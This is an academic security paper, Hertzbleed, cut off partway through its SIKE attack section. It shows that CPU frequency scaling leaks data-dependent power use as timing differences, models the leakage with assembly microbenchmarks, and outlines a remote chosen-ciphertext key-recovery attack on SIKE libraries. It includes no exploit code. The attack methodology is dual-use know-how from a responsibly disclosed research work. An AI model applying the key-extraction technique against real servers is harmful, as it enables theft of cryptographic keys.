Hertzbleed: Turning Power Side-Channel Attacks Into Remote Timing Attacks on x86 Abstract Power side-channel attacks exploit data-dependent varia- tions in a CPU’s power consumption to leak secrets. In this paper, we show that on modern Intel (and AMD) x86 CPUs, power side-channel attacks can be turned into timing attacks that can be mounted without access to any power measure- ment interface. Our discovery is enabled by dynamic voltage and frequency scaling (DVFS). We find that, under certain circumstances, DVFS-induced variations in CPU frequency depend on the current power consumption (and hence, data) at the granularity of milliseconds. Making matters worse, these variations can be observed by a remote attacker, since frequency differences translate to wall time differences! The frequency side channel is theoretically more powerful than the software side channels considered in cryptographic engineering practice today, but it is difficult to exploit because it has a coarse granularity. Yet, we show that this new channel is a real threat to the security of cryptographic software. First, we reverse engineer the dependency between data, power, and frequency on a modern x86 CPU—finding, among other things, that differences as seemingly minute as a set bit’s position in a word can be distinguished through frequency changes. Second, we describe a novel chosen-ciphertext at- tack against (constant-time implementations of) SIKE, a post- quantum key encapsulation mechanism, that amplifies a sin- gle key-bit guess into many thousands of high- or low-power operations, allowing full key extraction via remote timing. 1 Introduction Power-analysis attacks have been known for decades to be a powerful source of side channel information leakage. His- torically, these attacks were used to leak cryptographic se- crets from embedded devices like smart cards using physical probes [3,39,59,68,74,75]. Recently, however, power-analysis attacks have been shown to be exploitable also via software power measurement interfaces. Such interfaces, available ∗These authors contributed equally to this work. on many of today’s general-purpose processors, have been abused to fingerprint websites [95], recover RSA keys [70], break KASLR [63], and even recover AES-NI keys [64]. Fortunately, software-based power-analysis attacks can be mitigated and easily detected by blocking (or restricting [10]) access to power measurement interfaces. Up until today, such a mitigation strategy would effectively reduce the attack sur- face to physical power analysis, a significantly smaller threat in the context of modern general-purpose x86 processors. In this paper, we show that, on modern Intel (and AMD) x86 CPUs, power-analysis attacks can be turned into timing attacks—effectively lifting the need for any power measure- ment interface. Our discovery is enabled by the aggressive dy- namic voltage and frequency scaling (DVFS) of these CPUs. DVFS is a commonly-used technique that consists of dynami- cally adjusting CPU frequency to reduce power consumption (during low CPU loads) and to ensure that the system stays below power and thermal limits (during high CPU loads). We find that, under certain circumstances, DVFS-induced CPU frequency adjustments depend on the current power consump- tion at the granularity of milliseconds. Therefore, since the power consumption is data dependent, it follows transitively that CPU frequency adjustments are data dependent too. Making matters worse, we show that data-dependent fre- quency adjustments can be observed without the need for any special privileges and even by a remote attacker. The reason is that CPU frequency differences directly translate to execution time differences (as 1 hertz = 1 cycle per second). The security implications of this finding are significant. For example, they fundamentally undermine constant-time programming, which has been the bedrock defense against timing attacks since their discovery in 1996 [58]. The premise behind constant-time programming is that by writing a program to only use “safe” instructions, whose latency is invariant to the data values, the program’s execution time will be data-independent. With the frequency channel, however, timing becomes a function of data—even when only safe instructions are used. Despite its theoretical power, it is not obvious how to con- struct practical exploits through the frequency side channel. This is because DVFS updates depend on the aggregate power consumption over millions of CPU cycles and only reflect coarse-grained program behavior. Yet, we show that the fre- quency side channel is a real threat to the security of crypto- graphic software, by (i) reverse engineering a precise leakage model for this channel on modern x86 CPUs, and (ii) showing that some cryptographic primitives admit amplification of single key bit guesses into thousands of high- or low-power operations, enough to induce a measurable timing difference. To construct a leakage model, we reverse engineer the de- pendency between data being computed on and power con- sumption / frequency on modern x86 Intel CPUs. Our results reveal that power consumption and CPU frequency depend on both the Hamming weight (HW) of data being processed and the Hamming distance (HD) of data across computations. We show, for the first time, that these two effects are distinct and additive on modern Intel CPUs. Further, the HW effect is non uniform. That is, computing on data with the same HW results in differences in power consumption / frequency depending on the position of individual 1s within data values. The take- away is that computing on data with different bit patterns depending on a secret can result in different power consump- tions and frequencies depending on that secret. We expect that this information will also be useful towards building future, Intel-specific power leakage emulators [11,60,72,87,89]. We find that AMD x86 CPUs also feature a similar leakage model, but leave reverse engineering its details to future work. We then describe a novel attack, including new cryptana- lytic techniques, on two production-ready, constant-time im- plementations of SIKE (Supersingular Isogeny Key Encap- sulation [52]). SIKE is a decade old, widely studied key en- capsulation mechanism. Unlike other finalists in NIST’s Post- Quantum Cryptography competition, SIKE has both short ciphertexts and short public keys — and a “well-understood” side channel posture [20]. In our attack, we show that, when provided with a specially-crafted input, SIKE’s decapsula- tion algorithm produces anomalous 0 values that depend on single bits of the key. Worse so, these values cause the algo- rithm to get stuck and operate on intermediate values that are also 0 for the remainder of the decapsulation. When this hap- pens, the processor consumes less power and runs at a higher frequency than usual, and therefore decapsulation takes a shorter wall time. This timing signal is so robust that key extraction is possible across a network, as we demonstrate for the SIKE implementations in both Cloudflare’s Interop- erable Reusable Cryptographic Library (CIRCL) [28] and Microsoft’s PQCrypto-SIDH [66]. Our unoptimized version of the attack recovers the full key from these libraries in 36 and 89 hours, respectively. Finally, we show that the frequency side channel can also be used to mount timing attacks without a timer, such as a KASLR break and a covert channel. Disclosure We disclosed our findings, together with proof- of-concept code, to Intel, Cloudflare and Microsoft in Q3 2021 and to AMD in Q1 2022. The attack was assigned CVE-2022- 23823 and CVE-2022-24436 and held under embargo until June 14, 2022. Intel committed to awarding us a bug bounty. Cloudflare and Microsoft deployed a mitigation to CIRCL and PQCrypto-SIDH, respectively. 2 Background and Related Work Intel P-States In Intel processors, dynamic voltage and fre- quency scaling (DVFS) works at the granularity of P-states. P-states correspond to different operating points (voltage- frequency pairs) in 100 MHz frequency increments [49]. The number of P-states varies across different CPU models. Mod- ern Intel processors offer two mechanisms to control P-states, namely SpeedStep and Speed Shift / Hardware Controlled Per- formance States (HWP). With SpeedStep, P-states are man- aged by the operating system (OS) using hardware coordina- tion feedback registers. With HWP, P-states are managed en- tirely by the processor, increasing the overall responsiveness. HWP was introduced with the Skylake microarchitecture [78]. When HWP is enabled, the OS can only give hints to the pro- cessor’s internal P-state selection logic, including restricting the range of available P-states [91]. Otherwise, the available range of P-states depends only on the number of active cores and on whether “Turbo Boost” is enabled [55]. Our P-state naming convention follows the one used in Linux [91].1 The lowest P-state corresponds to the lowest supported CPU fre- quency. The highest P-state corresponds to the “max turbo” frequency for the processor. However, when Turbo Boost is disabled, the highest available P-state is the base frequency. We use the term P-state and frequency interchangeably. P-state management is also related to power management. Each Intel processor has a Thermal Design Point (TDP), indi- cating the expected power consumption at steady state under a sustained workload [22, 40]. While in the max turbo mode, the processor can exceed its nominal TDP [47]. However, if the CPU hits a certain power and thermal limit while in max turbo mode, the hardware will automatically downclock the frequency to stay at TDP for the duration of the workload. Data-Dependent Power Consumption It is well-known that a processor’s power consumption depends on the data being processed [46, 68]. The precise dependency between data and power consumption depends on the processor’s im- plementation, but can be approximated using leakage mod- els. Two commonly-used leakage models are the Hamming distance (HD) [9, 61, 68, 71, 77] and the Hamming weight (HW) [56, 61, 67, 71, 73, 74, 88] models. In the HD model, power consumption depends to the number of 1 → 0 and 0 → 1 bit transitions occurring in the data during a computa- tion. In the HW model, power consumption just depends on the number of bits that are 1 in the data being processed. 1However, Intel refers to higher frequencies as lower P-states [48, 50]. Table 1: CPUs tested in our experimental setups. CPU Model Microarchitecture Cores Base Frequency Max Turbo Frequency i7-8700 Coffee Lake 6 3.20 GHz 4.60 GHz i7-9700 Coffee Lake Refresh 8 3.00 GHz 4.70 GHz i9-10900K Comet Lake 10 3.70 GHz 5.30 GHz i7-11700 Rocket Lake 8 2.50 GHz 4.90 GHz i7-10850H Ice Lake (mobile) 6 2.70 GHz 5.10 GHz i7-1185G7 Tiger Lake (mobile) 4 3.00 GHz 4.80 GHz Power Side-Channel Attacks Power side-channel attacks against cryptosystems were first publicly discussed by Kocher in 1998 [59]. His work introduced analytical techniques that exploit the data dependency of power consumption to reveal secret keys. Following works demonstrated power-analysis attacks against several cryptographic algorithms including AES [14, 67], DES [74], RSA [30, 75, 80, 94], and ElGa- mal [16,30].2 However, all these attacks were targeted against smart cards and required physical access to the device. More recently, power side-channel attacks have been applied also to more complex devices such as smartphones [15,35,76,92,93] and PCs [36, 63, 64, 70, 95]. Some of these attacks rely only on software power measurement interfaces, meaning that they do not need proximity to the device. However, while some of these works use the HW and HD leakage models [64, 70], none of them presents a systematic reverse engineering of the dependency between power consumption and data on modern Intel x86 CPUs. Further, all these attacks can be blocked by restricting access to such power measurement interfaces. 3 CPU Frequency Leakage Channel In this section, we analyze the leakage from CPU frequency variations on modern Intel processors. We show that, un- der certain circumstances, the distribution of a processor’s frequencies leaks information about the instructions being executed as well as the data being processed. Experimental Setup We run our experiments on several different machines. The characteristics of the CPU of each machine are reported in Table 1. All our machines run Ubuntu with versions either 18.04 or 20.04, kernel either 4.15 or 5.4, and the latest microcode patches installed. Unless otherwise noted, we use the default system configuration, without re- stricting the P-states. To monitor CPU frequency, we use the MSR_IA32_MPERF and MSR_IA32_APERF registers, as done in the Linux kernel [62]. To monitor power consumption, we use the MSRs of the RAPL interface, following Weaver [90]. 3.1 Distinguishing Instructions As a first step for our analysis, we set out to understand how running different workloads affects the P-state selection logic 2For a comprehensive survey of these attacks, we refer to prior work [68]. 3.9 4.0 4.1 4.2 4.3 4.4 4.5 Frequency (GHz) 0 5 10 15 Time (s) 60 70 80 90 100 110 120 Power (W) (a) Run of the int32-float test 3.9 4.0 4.1 4.2 4.3 4.4 4.5 Frequency (GHz) 0 5 10 15 Time (s) 60 70 80 90 100 110 120 Power (W) (b) Run of the int32 test Figure 1: Example of distinguishing workloads using fre- quency traces on our i7-9700 CPU. The lighter workload (int32) allows for longer runtimes at higher frequencies than the heavier workload (int32-float). of our CPUs. We pick two workloads from the stress-ng benchmark suite [57]. The first workload consists of 32-bit integer and floating-point operations (int32float method), while the second workload consists of only 32-bit integer oper- ations (int32 method). We run both benchmarks on all cores and starting from an idle machine. We sample the CPU fre- quency and the (package domain) power consumption every 5 ms during the benchmark’s execution. Figure 1a shows the results for the int32float test on our i7-9700 CPU. The frequency starts at 4.5 GHz, the highest P-state available when all cores are active on our CPU. This frequency is sustained for about 8 seconds, during which the power consumption is allowed to exceed the TDP. Then, the CPU drops to a lower P-state, bringing the power consumption down to TDP (65 W on our CPU). From there onwards, the CPU remains in steady state and power stays around the TDP level for the duration of the workload. In our example, at steady state the frequency oscillates between two P-states, corresponding to the frequencies of 3.9 GHz and 4.0 GHz. Figure 1b shows the results for the int32 stress test. Here too, the frequency starts at 4.5 GHz and later drops to a lower P-state. However, compared to Figure 1a, (i) the drop occurs later, after 10 seconds, and (ii) the P-states used after the drop are higher, corresponding to 4.0 GHz and 4.1 GHz. This is because the power consumption of the int32 test is lower. As a consequence, not only can the processor sustain the highest available P-state for longer, but it can also use higher P-states in steady state without exceeding the TDP. The key takeaway from the above results is that both (i) the time that a processor can spend at the maximum available P-state and (ii) the distribution of P-states at steady state de- pend on the CPU power consumption. Since the CPU power consumption depends on the workload, by the transitive prop- erty it follows that P-states depend on the workload too. This implies that dynamic scaling of P-states leaks information about the current workload running on the processor. 4.3 4.4 Frequency (GHz) 0.0 0.2 0.4 0.6 0.8 Probability hw=16 hw=32 hw=48 (a) Frequency at steady state 19.5 20.0 20.5 Seconds before steady state 0 2 4 6 Probability density hw=16 hw=32 hw=48 (b) Seconds before steady state Figure 2: Distinguishing data (in the source register to a shlx instruction) using frequency traces on our i7-9700 CPU. Fig- ure 2a is over 30,000 samples. Figure 2b is over 100 traces. 3.2 Distinguishing Data We saw that P-state information leaks information about the instructions being executed (i.e., the workload). We now ex- plore if the frequency leakage channel can leak information about the data being processed by instructions. Our question is motivated by the fact that power consumption on x86 pro- cessors is known to be data dependent [64]. It is thus natural to ask: do data-dependent differences in power consumption show in the distribution of P-states? To answer this question, we monitor the CPU frequency while executing the same instructions and only changing the content of the input registers. For example, we use the shlx instruction to continuously shift left the bits of a source regis- ter and write the result into different destination registers in a loop, while only varying the content of the source register. We run this experiment on all cores and compare the distribution of the P-states in steady state. Figure 2a shows the results when we set the content of the source register to have 16, 32 or 48 ones. In all cases the P-state oscillated between 4.3 GHz and 4.4 GHz. However, the larger the Hamming weight, the more the frequency stayed at the lower P-state. We also saw a data-dependent difference in terms of when the frequency drops to steady state if we start from idle (cf. Figure 2b). The larger the Hamming weight, the quicker the frequency drops to steady state. This is because, as we show in Section 4, pro- cessing data with larger Hamming weights consumes more power than processing data with lower Hamming weights. We get similar results with other instructions too. For ex- ample, we observed data-dependent effects when running or, xor, and, imul, add, sub, as well as when computing on data loaded from memory. The only caveat is that, for some in- structions, the power consumption of just running the target instruction in a loop on all cores was not large enough to cause the P-state to ever drop to steady state. In these cases, we ran an additional, fixed workload in the background to push the total power consumption up. The key takeaway of the above results is that dynamic scaling of P-states leaks information about the data being processed. In the following sections, we use the distribution of P-states at steady state as our leakage channel. 4 CPU Frequency Leakage Model We saw that the power consumption and the distribution of P-states in Intel CPUs depend on the data being processed. The goal of this section is to construct a leakage model of this behavior. To this end, we reverse engineer the dependency be- tween power consumption/frequency and data on the ALU of modern Intel CPUs. As we show in Section 5, this information can help an attacker construct side-channel attacks. Scope Precisely understanding where power is dissipated as a function of data on general-purpose x86 processors is a challenging task. The reason is that the microarchitecture of modern x86 processors is (i) highly complex and (ii) largely undocumented. Fortunately, studying the power consumption across all microarchitectural units is not necessary to build attacks. This is because the vast majority of computations performed by modern, constant-time cryptographic software occurs in the arithmetic logic unit (ALU). Since our primary goal is to build a model that is useful to leak secrets from constant-time cryptographic code, the analysis in this section focuses specifically on the ALU component. Methodology We use the experimental setup of Section 3. In each experiment, we run a fixed set of ALU instructions (the sender) in a loop on all cores, while varying the input contents. We carefully design our senders to target specific behaviors and minimize side effects. First, to reduce power consumption from other core units such as the cache, we always use register to register instructions without any mem- ory access. Second, to avoid any datapath contamination ef- fects caused by incrementing the loop counter variable and evaluating loop conditions, we run our sender in an infinite loop that we manually terminate at the end of the experiment. Third, to avoid introducing unintended HD effects, we inter- leave different instructions in such a way that encourages full throughput on all available ports [1, 2]. Finally, we run each sender in two setups. In the first setup, we use the default system configuration, warm up the machine until it enters steady state, and monitor the frequency. In the second setup, we disable SpeedStep / HWP (this way, our processor stays at the base frequency for the duration of the workload) and monitor the (core domain) power consumption. We sample power/frequency every 1 ms, collect 30,000 data points for each experiment and use their mean for our analyses. 4.1 Hamming Distance (HD) Effect To start, we set out to understand if the number of 1 → 0 and 0 → 1 transitions affects power consumption / frequency. Recall that these transitions depend on the number of bits that differ (also known as the HD) between consecutive data values being processed. To study the dependency between HD and power consumption / frequency, we then need a sender that offers fine-grained control over the number of transitions, rax = COUNT rbx = 0x0000FFFFFFFF0000 loop: shlx %rax,%rbx,%rcx // rcx = rbx << rax shlx %rax,%rbx,%rdx // rdx = rbx << rax shrx %rax,%rbx,%rsi // rsi = rbx >> rax shrx %rax,%rbx,%rdi // rdi = rbx >> rax shlx %rax,%rbx,%r8 // r8 = rbx << rax shlx %rax,%rbx,%r9 // r9 = rbx << rax shrx %rax,%rbx,%r10 // r10 = rbx >> rax shrx %rax,%rbx,%r11 // r11 = rbx >> rax jmp loop (a) Sender for our HD experiments. rax = LEFT rcx = … = r11 = RIGHT loop: or %rax,%rcx // rcx = rax | rcx or %rax,%rdx // rdx = rax | rdx or %rax,%rsi // rsi = rax | rsi or %rax,%rdi // rdi = rax | rdi or %rax,%r8 // r8 = rax | r8 or %rax,%r9 // r9 = rax | r9 or %rax,%r10 // r10 = rax | r10 or %rax,%r11 // r11 = rax | r11 jmp loop (b) Sender for our HW experiments. rax = rcx = rdx = rsi = rdi = FIRST rbx = r8 = r9 = r10 = r11 = SECOND loop: or %rax,%rcx // rcx = rax | rcx or %rax,%rdx // rdx = rax | rdx or %rax,%rsi // rsi = rax | rsi or %rax,%rdi // rdi = rax | rdi or %rbx,%r8 // r8 = rbx | r8 or %rbx,%r9 // r9 = rbx | r9 or %rbx,%r10 // r10 = rbx | r10 or %rbx,%r11 // r11 = rbx | r11 jmp loop (c) Sender for our HW+HD experiments. Figure 3: Different sets of instructions (senders) used to reverse engineer the dependency between data and power consumption / frequency on our CPUs. Different senders are designed to target different effects. Each sender can be run with variable inputs. 0 5 10 15 COUNT 4.26 4.27 4.28 4.29 Frequency (GHz) (a) Frequency vs COUNT 0 5 10 15 COUNT 23.2 23.4 23.6 23.8 Power (W) (b) Power vs COUNT Figure 4: Effect of increasing COUNT in Figure 3a’s sender on our i7-9700 CPU. Higher COUNT values cause higher HDs in the ALU output. As the HD increases, the mean power con- sumption grows and the mean steady-state frequency drops. while avoiding other potential side effects. For example, test- ing different HDs should not require changing the number of 1s in the input (which, as we show below, is a separate effect).3 We design our sender to use interleaved shlx and shrx instructions, as shown in Figure 3a. These instructions shift the bits of the second source register to the left or right by a COUNT value stored in the first source register. The result is written to a separate destination register. Since on our CPUs shlx and shrx execute on port 0 and port 6 [1], we interleave them in groups of two. We fix the content of the second source register to 0x0000ffffffff0000, corresponding to 16 zeros, followed by 32 ones, followed by 16 zeros. We then shift this register left and right by COUNT (with 0 ≤ COUNT ≤ 16). By construction, the HD in the ALU output between a shlx and a shrx is 4×COUNT. For example, when COUNT = 8, the output of each shlx is 0x00ffffffff000000, and the output of each shrx is 0x000000ffffffff00, translating to 4×8 bit transitions in the ALU output. Yet, the ALU input remains unchanged and the number of 1s in the source and the destination registers is fixed.4 3This requirement implies that approaches such as using a xor instruction to cause bit transitions are not suitable, because triggering different numbers of transitions would also require using different numbers of 1s in the input. 4The only other variable is the number of 1s in the COUNT register itself, Figure 4 shows the results when we vary the COUNT value. We see that the power consumption grows and the frequency drops when COUNT grows, confirming that the number of bit transitions directly affects power consumption and frequency. In Appendix A.1, we corroborate this observation with an ad- ditional experiment where transitions occur in the ALU input. These results are consistent on all the CPUs of Table 1. 1. Larger Hamming distances between data values being processed contribute to larger power consumptions and lower steady-state frequencies. 4.2 Hamming Weight (HW) Effect We now set out to understand if the HW of the data values be- ing processed affects power consumption / frequency. Recall that the idea behind the HW model is that power consumption depends on the number of 1s in the data being processed. To study the dependency between HW and power consumption / frequency, we need a sender that offers fine-grained control over the number of 1s, while avoiding other potential side effects. For example, testing different HWs should not require bit transitions in the data (i.e., the HD effect). To satisfy the above requirements, we design a sender that uses or logic instructions, as shown in Figure 3b. These in- structions perform a bitwise inclusive or operation between the source register and the destination register, and store the result in the destination register. We always use the same input and output registers for all the or instructions in the loop. We fix the content of the source register to LEFT, and set the initial content of the output register to RIGHT. By construction, the number of bit transitions occurring on the ALU input and output during the execution of the above sender is zero. The reason is that all or instructions take the same inputs and produce the same output during an experi- ment. Hence, we can test different HW in the source registers without introducing any HD effects. An added benefit of us- ing or instructions is that they allow us to study the effects which varies between 1 and 4. However, this effect is negligible. 0 20 40 60 Hamming weight 4.12 4.14 4.16 Frequency (GHz) From LSB From MSB (a) Frequency vs HW 0 20 40 60 Hamming weight 26.25 26.50 26.75 27.00 27.25 Power (W) From LSB From MSB (b) Power vs HW Figure 5: Effect of varying the number of consecutive 1s in the LEFT = RIGHT input to Figure 3b’s sender on our i7-9700 CPU. As we increase the number of 1s, the mean power con- sumption grows and the mean steady-state frequency drops. of changing some bits of the input register (LEFT) without affecting the contents of the output register (RIGHT). We use this sender to perform multiple experiments. Consecutive 1s We start our analysis of the HW effect by checking if the number of leading or trailing 1s in the data af- fects power consumption / frequency. We set LEFT = RIGHT such that the inputs and outputs of all or instructions are al- ways the same. We then run the sender with a varying HW in the LEFT = RIGHT values. Figure 5 shows the results when the HW grows from 0 to 64, both when the 1s start from the least significant bit (LSB) and when they start from the most significant bit (MSB). In both cases, the power consumption grows and the frequency drops when the HW grows. 2. A larger number of leading or trailing 1s in the data values being processed contributes to larger power con- sumptions and lower steady-state frequencies. We also see that the changes in power consumption and frequency appear to be nonlinear. That is, the plots of Figure 5 have a “bow” shape, suggesting that the HW effect is stronger for the most significant 32 bits than for the least significant 32 bits. For example, when the input is 0xffffffff00000000 (HW=32, orange line), the HW effect is larger than when it is 0x00000000ffffffff (HW=32, blue line). This suggests that given data values with the same HW, their contribution power / frequency may also depend on the position of 1s. We thoroughly examine this observation later in this subsection. Non-consecutive 1s The above experiment shows that power consumption and frequency can depend on the HW of the data being processed. However, it only focuses on a bit pattern of consecutive 1s and 0s. In reality, 1s and 0s might occur in anywhere in the data. For our model to be useful, we need to test if the HW effect applies to arbitrary bit patterns. To analyze the HW effect in the presence of non- consecutive 1s, we run a variant of our previous experiment, where we increase the HW at byte granularity. That is, we break the 64-bit registers LEFT = RIGHT into 8 bytes and 0 2 4 6 8 Hamming weight 4.12 4.14 4.16 Frequency (GHz) (a) Frequency vs HW 0 2 4 6 8 Hamming weight 26.25 26.50 26.75 27.00 27.25 Power (W) (b) Power vs HW Figure 6: Effect of varying the number of non-consecutive 1s in the LEFT = RIGHT input to Figure 3b’s sender on our i7- 9700 CPU. The results confirm that larger HWs cause higher power consumptions and lower steady-state frequencies. 0 1 2 3 4 5 6 7 Byte index 0.008 0.006 0.004 Frequency (GHz) (a) Effect of 0xFF to frequency 0 1 2 3 4 5 6 7 Byte index 0.10 0.15 0.20 Power (W) (b) Effect of 0xFF to power Figure 7: Effect of setting single bytes to 0xff in the LEFT = RIGHT input to Figure 3b’s sender on our i7-9700 CPU. The effect varies depending on the position of 1s within the inputs. HW differences in the MSBs have the strongest effect; HW differences in the bits right below 32 have the weakest effect. vary the HW within each byte. Increasing the HW within each byte allows us to measure the impact of different num- bers of non-consecutive 1s. For example, when the HW for each byte is 2, we set 2 bits of each byte to 1, for a total HW of 2×8 = 16. Figure 6 shows the results, clearly indicating that a larger number of non-consecutive 1s contributes to a larger power consumption and lower CPU frequency. 3. A larger Hamming weight (number of 1s) in the data values being processed contributes to larger power con- sumptions and lower steady-state frequencies regardless of whether the 1s are consecutive or not. Non-uniformity of the HW Effect To analyze the impact of the position of 1s within the data, we run another variant of our previous experiment. We break the 64-bit registers LEFT = RIGHT into 8 bytes. Each byte can be set to 0x00 (all 0s) or 0xff (all 1s). When we target byte i, we fix the value of the other 7 bytes and compute the delta of power consumption / frequency between setting byte i to 0xff and 0x00. For each byte, we repeat this test with all the 2 7 combinations of the other 7 bytes. We compute the average and standard deviation of the deltas for each byte and show the result in Figure 7. We immediately see that the HW effect is non-uniform across different bytes. At a high level, the 4 most significant bytes have a stronger HW effect than the 4 least significant bytes, and bytes closer to the 32nd bit have a weaker HW effect than bytes farther from the 32nd bit. This is consis- tent with our previous observation that an input where the most significant 32 bits are 1 consumes more power than an input where the least significant 32 bits are 1, even if their HWs are the same. Further, the standard deviations are rel- atively small, suggesting that the HW effect of each byte is independent of the values of other bytes. For example, the power/frequency deltas between 0x0000ff0000000000 and 0x000000000000000 are the same as the ones between 0xff00ffff00ffffff and 0xff0000ff00ffffff. We sus- pect that these properties also hold a bit granularity, but are unable to confirm because it would require collecting data for 2 64 bit combinations for a runtime of more than 1013 years. Note that the difference in the HW effect due to the position of 1s is relatively small (e.g., ≤ 0.12 W in Figure 7b) com- pared to the difference in the HW effect due to the number of 1s (e.g., ≤ 1.11 W in Figures 5b and 6b) and the HD effect due to bit transitions (e.g., ≤ 0.75 W in Figure 4b). 4. The HW effect is non-uniform. 1s in the most signifi- cant bytes affect power and frequency more than 1s in the least significant bytes. Additionally, the HW effect at each byte is independent of the values of other bytes. The above experiments show that power consumption and frequency depend both on the number and the positions of 1s in the data being processed. However, both experiments were designed using LEFT = RIGHT, meaning that all the source and destination registers used by the sender during an experiment were the same. It is then natural to ask: does the HW effect occur even when LEFT 6= RIGHT? To answer this question, we repeated the above two experiments, but this time set LEFT = 0 and only varied the HW of RIGHT. 5 Both experiments yielded results similar to the ones where LEFT = RIGHT, albeit with smaller increments/decrements in power/frequency. This result shows that the HW effect on an operand is independent of the contents of other operands. 5. The HW effect occurs on each operand independently. To sum up, the HW effect may be approximated as a linear combination of two vectors. The first vector is the number of 1s per byte, and the second vector is the non-uniform power consumption / frequency “cost” of 1s in that byte (based on the deltas of Figure 7). In Appendix A.1 we discuss additional experiments in support of this model. We verified that this model applies to all the CPUs of Table 1. However, the non- uniform “costs” per byte of the HW effect can be different across CPU models. For example, in the 11th gen CPUs, the HW effect is more uniform compared to Figure 7. 5Whether LEFT = 0 or LEFT = RIGHT, the result of the or is still RIGHT. 0 20 40 60 HW of SECOND 3.98 4.00 4.02 4.04 Frequency (GHz) A B C D (a) Frequency vs HW 0 20 40 60 HW of SECOND 29.5 30.0 30.5 31.0 Power (W) A B C D (b) Power vs HW Figure 8: Effect of increasing the HW of SECOND in Fig- ure 3c’s sender, while fixing FIRST to different values on our i7-9700 CPU. Power consumption grows and steady-state frequency drops when both HW and HD increase at the same time (net effect of HW+HD). However, power consumption drops and steady-state frequency grows when HW increments correspond to HD decrements (net effect of HW−HD). 4.3 Additivity of the HW and HD Effects Finally, we set out to understand if the HD and HW effects are additive. To this end, we design our sender to use or instruc- tions with interleaved operand contents, as shown in Figure 3c. In this sender, half of the instructions computes FIRST|FIRST and the other half computes SECOND|SECOND. We in- terleave these instructions in groups of four, since on our CPUs or instructions use four ports [1]. We then test setting FIRST to be A = 0x000000000000ffff, B = 0xffff000000000000, C = 0x00000000ffffffff, or D = 0xffffffff00000000, and increase the HW of SECOND from 0 to 64, starting from the least significant bit. Figure 8 shows the results. Consider the case when FIRST = C. As the HW of SECOND increases from 0 to 32, the HD between FIRST and SECOND decreases, causing the power consumption to drop and the frequency to grow. However, as HW of SECOND increases from 32 to 64, the HD between FIRST and SECOND increases, causing the opposite effect. The slope between 0 and 32 is smaller than the one between 32 and 64. This is because the former is a net effect of HW minus HD whereas the latter is a net effect of HD plus HW. For the other values of FIRST, we see analogous effects but with different constant offsets. This result (consistent across the CPUs of Table 1) shows that the HW and the HD effects can simultaneously contribute to power and frequency. 6. The HD and HW effects are additive and can simulta- neously contribute to differences in power consumption and steady-state frequency. 5 Remote Timing Attack on SIKE The previous sections have shown that carefully crafted in- struction sequences can trigger data-dependent power con- sumption and frequency differences. In this section, we show that the frequency side channel threat extends to in-the-wild software. Specifically, we show how to use the frequency side channel, combined with novel cryptanalysis, for a full key recovery attack through remote timing on two production- ready, side-channel hardened implementations of Supersingu- lar Isogeny Key Encapsulation (SIKE) [52], a post-quantum key encapsulation mechanism based on the Supersingular Isogeny Diffie-Hellman (SIDH) [53] key exchange protocol. Attack Model We assume a chosen-ciphertext attack model (CCA). The goal of the attacker (client) is to recover the static secret key used by the victim (server) to decapsulate ciphertexts. The attacker can send many ciphertexts to the victim, which always tries to compute the shared secret with the decapsulation procedure using its static secret key. Attack Idea The server’s static secret key is an integer m with bit expansion m = (m`−1,...,m0)2, where ` = 378 (for SIKE-751, the parameter selection we target in our experi- ments). During decapsulation, the server computes P+[m]Q for elliptic curve points P and Q included in the ciphertext; the SIKE standard prescribes a particularly efficient algorithm for evaluating this expression, the Montgomery three-point ladder [29]. We show that an attacker who knows the i least significant bits of m can construct points P and Q such that: • If mi 6= mi−1, then the (i+1)st round of the Montgomery three-point ladder produces an anomalous 0 value. Once that anomalous 0 value appears, the decapsulation algo- rithm gets stuck: every intermediate value produced for the remainder of the ladder is 0. Additionally, every intermedi- ate value produced for the function (isogeny computation) following the ladder is also 0. • If, however, mi = mi−1, or if the attacker was wrong about the i least significant bits of m when constructing the chal- lenge ciphertext, then the (i+1)st round generates a non-0 value. Heuristically, the remainder of the computation pro- ceeds without producing an anomalous 0 value except with negligible probability. This observation is new, and it represents a core contribution of our work. Because SIKE is built on somewhat abstruse math, we defer the details of how to construct points P and Q that trigger an anomalous 0 value, and why a 0 value causes the decapsulation algorithm to get stuck, to Section 5.3. The values operated on by SIKE decapsulation are large (a single element of the field underlying SIKE-751 takes 188 bytes to express) and the operations themselves are com- plex: the inner loop of the Montgomery ladder comprises thousands of lines of hand-optimized assembly. Nevertheless, in Section 5.1, we show that SIKE decapsulation behaves like the much simpler, synthetic senders of Section 4. When mi 6= mi−1 and the decapsulation algorithm gets stuck, repeat- edly producing and operating on 0 values, the processor con- sumes less power and runs at a higher steady-state frequency (and therefore decapsulation takes a shorter wall time). Taken together, our findings mean that the server’s secret key can be recovered by an adaptive chosen-ciphertext attack, using execution time as a side channel. Having extracted the first i bits of m, the adversary repeatedly queries the server with ciphertexts that should cause decapsulation to get stuck in the (i + 1)st round. If the server responds faster than a baseline (established through profiling), the adversary con- cludes that bit mi is the opposite of bit mi−1; otherwise bit mi is the same. The attacker then proceeds to the next bit. In Section 5.2, we show that the timing signal is so robust that key extraction is possible across a network. We demonstrate full recovery of the (378-bit) private key from the SIKE-751 implementations in two popular, production-ready crypto- graphic libraries: Cloudflare’s Interoperable Reusable Crypto- graphic Library (CIRCL) [28], written in Go, and Microsoft’s PQCrypto-SIDH [66], written in C. Both of libraries are hard- ened against previously known software side channels and meant to run in constant time. Our attack is practical; an un- optimized version recovers the full key from a CIRCL server in 36 hours and from a PQCrypto-SIDH server in 89 hours. 5.1 P-State and SIKE implementation We start by verifying that a correct key-bit guess in our chosen- ciphertext attack—one that causes the Montgomery ladder and the remainder of SIKE decapsulation to repeatedly pro- duce 0 values—causes the processor to execute at a higher frequency than an incorrect key-bit guess does. Our local ex- periment uses 10 randomly generated SIKE-751 server keys. For each key m = (m`−1,...,m0)2, we target 4 out of the 378 bit positions. We choose the target bit positions uniformly at random, to validate that the frequency difference is observable even for bits accessed late in the Montgomery ladder loop. Suppose we target bit i in a secret key m. Provided that mi 6= mi−1, we can craft a challenge ciphertext that will trigger an anomalous 0 value in the Montgomery ladder iteration that accesses bit i. However, if mi = mi−1, then there is no chal- lenge ciphertext that can trigger the anomalous 0 value. To make sure we are measuring the effect of anomalous 0 values, and not some other unknown effect, we set up our experiment as follows. For each key m and each target bit index i, we create a variant key m 0 that agrees with m at every bit posi- tion except index i, where it has the opposite bit value.6 In other words, m 0 = 3.8 3.9 4.0 Frequency (GHz) 0.0 0.2 0.4 0.6 0.8 Probability mi = mi 1 mi mi 1 30 35 40 Power consumption (W) 0.0 0.1 0.2 Probability density mi = mi 1 mi mi 1 (a) CIRCL data 3.6 3.7 